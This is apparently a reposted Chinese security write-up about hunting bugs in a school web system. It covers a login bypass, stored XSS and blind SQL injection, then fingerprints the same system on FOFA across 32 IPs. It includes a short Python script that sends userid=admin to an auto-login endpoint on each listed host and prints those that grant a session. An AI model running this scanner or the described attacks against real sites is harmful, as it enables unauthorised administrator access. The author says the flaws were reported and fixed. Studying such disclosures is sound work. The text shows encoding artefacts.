一、漏洞挖掘
1、邏輯缺陷
熟悉的頁面,熟悉的弱口令測試,但無果
我就把目光轉(zhuǎn)向js審計(jì),果不其然有新發(fā)現(xiàn),可以根據(jù)賬號自動(dòng)登錄
于是直接構(gòu)造請求繞過登錄
經(jīng)典的管理員權(quán)限
2、存儲(chǔ)型XSS
尋找文本輸入
淺析:前端:這里的標(biāo)簽都是普通標(biāo)簽,沒有像RCDATA元素(RCDATA elements),有
所以就簡單了,直接插入即可
3、SQL注入
測試無果
最后發(fā)現(xiàn)注入點(diǎn)在第一個(gè)函數(shù),果然任何一個(gè)輸入點(diǎn)都可能是不安全的,是布爾型盲注
后面就是經(jīng)典Sqlmap了
二、繼續(xù)通殺
根據(jù)系統(tǒng)指紋在fofa上搜索:"xx系統(tǒng)" && icon_hash="11xxxx"有32個(gè)IP,看了下,有重復(fù)的
使用fofa_viewer導(dǎo)出目標(biāo) 這里我根據(jù)第一個(gè)邏輯漏洞的漏洞指紋信息,寫了一個(gè)簡單poc
import requests def poc(url): poc_url = url + '/login/doautologin.edu' data = {'um.userid': "admin"} try: res = requests.post(poc_url, data=data, timeout=5) if (res.headers.get("Set-Cookie")): # 登錄成功就會(huì)set-cookie print(url + '/login.html') except BaseException: pass if __name__ == '__main__': with open('url.txt', 'r') as f: for i in f: poc(i.rstrip(' '))
以上漏洞均已報(bào)告給相應(yīng)學(xué)校且已修復(fù)
三、思考總結(jié)
1)在訪問系統(tǒng)當(dāng)中的時(shí)候F12查看源碼是一個(gè)不錯(cuò)的習(xí)慣(尤其是有前端彈框的)
2)前端代碼的一切展示行為完全可控(一定要理解這句話)
3)了解程序的底層邏輯,你才能更清晰的知道每一個(gè)參數(shù)的意義
本文作者:B0ther
審核編輯:黃飛
-
SQL
+關(guān)注
關(guān)注
1文章
764瀏覽量
44128 -
安全漏洞
+關(guān)注
關(guān)注
0文章
151瀏覽量
16712 -
edu
+關(guān)注
關(guān)注
0文章
14瀏覽量
1746
原文標(biāo)題:記一次EDU網(wǎng)站漏洞通殺
文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
評論